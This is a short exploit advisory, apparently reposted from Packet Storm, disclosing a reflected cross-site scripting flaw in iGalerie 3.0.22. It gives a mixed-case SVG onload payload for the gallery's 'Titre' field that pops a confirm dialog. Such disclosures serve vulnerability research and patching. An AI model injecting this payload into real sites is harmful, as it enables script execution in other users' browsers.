iGalerie 3.0.22 Cross Site Scripting
2024-1-8 23:5:29 Author: packetstormsecurity.com(查看原文) 阅读量:11 收藏

# Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS 
# Date: 2024-7-1
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.igalerie.org/
# Version: 3.0.22
# Tested on: https://softaculous.com/demos/iGalerie

1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/

Titre : "><sVg/onLy=1 onLoaD=confirm(1)//

2 ) Write in titre your payload , after save will be see alert button.


文章来源: https://packetstormsecurity.com/files/176411/igalerie3022-xss.txt
如有侵权请联系:admin#unsafe.sh